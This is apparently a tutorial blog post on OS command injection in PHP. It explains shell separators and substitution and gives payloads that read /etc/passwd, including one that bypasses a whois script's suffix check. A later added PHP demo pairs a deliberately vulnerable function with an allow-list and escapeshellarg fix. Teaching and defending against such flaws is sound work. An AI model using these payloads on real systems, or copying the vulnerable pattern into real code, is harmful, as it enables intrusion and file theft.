OS Command Injection
http://down--tech.blogspot.com/2015/01/os-command-injection.html
OS Command Injection is a vulnerability that lets an attacker smuggle shell commands into a script; the injected commands run with the privileges of the account the script runs as (usually the web server user, in the best case for the attacker: root). Most often this type of vulnerability comes up in PHP scripts that pass user input to one of these functions:
system(), passthru(), exec() or shell_exec()
(the backtick operator, popen() and proc_open() hand input to the shell in the same way)
How can this vulnerability be exploited?
First you need to understand a few things about the Unix shell.
The Unix shell uses certain characters and metacharacters to chain several commands in one command line.
Here are some examples:
semicolon ;
execution: "ls;id"
result: lists the current directory, then prints the user id
pipe |
execution: "ls|mail test@provider.com"
result: mails the listing of the current directory to test@provider.com
AND &&
execution: "ls&&id"
result: runs id only if ls succeeded (exit status 0)
newline (%0a when URL-encoded)
result: separates commands just like a semicolon
metachars `` and $()
execution: "echo `id`" or "echo $(id)"
result: the command between the backticks or inside $() runs first and its output is substituted into the outer command line
Now there are several ways to get commands into the script through an input field or a URL parameter:
;cat /etc/passwd
cat /etc/passwd
&&cat /etc/passwd
%0acat /etc/passwd
Each of these examples will display the file /etc/passwd.
In most cases the website will check your input. Take a whois script that only checks that the input ends with a domain suffix:
"cat /etc/passwd" is rejected, but
"cat /etc/passwd.com" passes the check and reaches the shell (because the script only requires a domain ending for the whois lookup).
To actually view /etc/passwd you only need a semicolon or pipe behind the command, with the domain ending after it, e.g. ";cat /etc/passwd;x.com".
If you use the substitution metacharacters, the command between them is executed first and its output is inserted into the command line.
For example:
$(cat /etc/passwd) `cat /etc/passwd`
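The following is an added example, not code from the original post: a PHP whois script of the kind described above, with the naive "must end in a domain suffix" check, next to a hardened version, fed with every payload form discussed on this page (separators, the filter bypass with a trailing dummy suffix, and command substitution). The function names, the regexes and the use of `id` instead of `cat /etc/passwd` are my assumptions for the demo; `whois` must be installed for the legitimate lookup to return anything.

```php
<?php
// Added example (not from the original post). Function names, regexes and
// payload list are assumptions made for this demo.

// --- vulnerable version: the input only has to END with a domain suffix ---
function whois_vulnerable(string $domain): string
{
    // Naive check: passes as long as the string ends in .com/.net/.org.
    if (!preg_match('/\.(com|net|org)$/i', $domain)) {
        return "invalid domain\n";
    }
    // The unescaped input lands directly on the shell command line.
    $out = shell_exec("whois " . $domain);
    return is_string($out) ? $out : '';
}

// --- hardened version: strict allow-list on the whole value + escapeshellarg() ---
function whois_hardened(string $domain): string
{
    // Allow-list: dotted labels of letters/digits/hyphens ending in a 2-63 letter
    // TLD, matched from ^ to \z so no prefix, suffix or newline can slip through.
    if (!preg_match('/^(?=.{1,253}\z)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}\z/i', $domain)) {
        return "invalid domain\n";
    }
    // Even a value that passed the allow-list is handed over as ONE quoted
    // argument, so the shell never interprets metacharacters in it.
    $out = shell_exec("whois " . escapeshellarg($domain));
    return is_string($out) ? $out : '';
}

// Payloads from the post, each padded with a dummy suffix so the naive
// "ends with .com" check is satisfied.
$payloads = [
    'example.com',     // legitimate lookup
    ';id;x.com',       // semicolon: whois runs (without args, fails), then id
    '|id;x.com',       // pipe: whois output is piped into id, id still runs
    '&&id;x.com',      // AND: id runs only if the (argument-less) whois succeeds
    "\nid\nx.com",     // newline (%0a in a URL) separates commands like ;
    '$(id).com',       // substitution: id runs, its output becomes whois' argument
    '`id`.com',        // backtick form of the same substitution
];

foreach ($payloads as $p) {
    echo "== vulnerable, input " . json_encode($p) . "\n";
    echo whois_vulnerable($p);
    echo "== hardened, input " . json_encode($p) . "\n";
    echo whois_hardened($p);
}
```

Run it with `php whois_demo.php`: every payload except `example.com` makes the vulnerable function execute `id` (or hand its output to whois), while the hardened function rejects all of them before anything reaches the shell. Note that the two measures are independent: the allow-list stops the injection, and `escapeshellarg()` keeps the command safe even if the allow-list is later loosened.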
I hope you can read my dirty English.
Additionally I will add a topic about blind OS command injection soon.
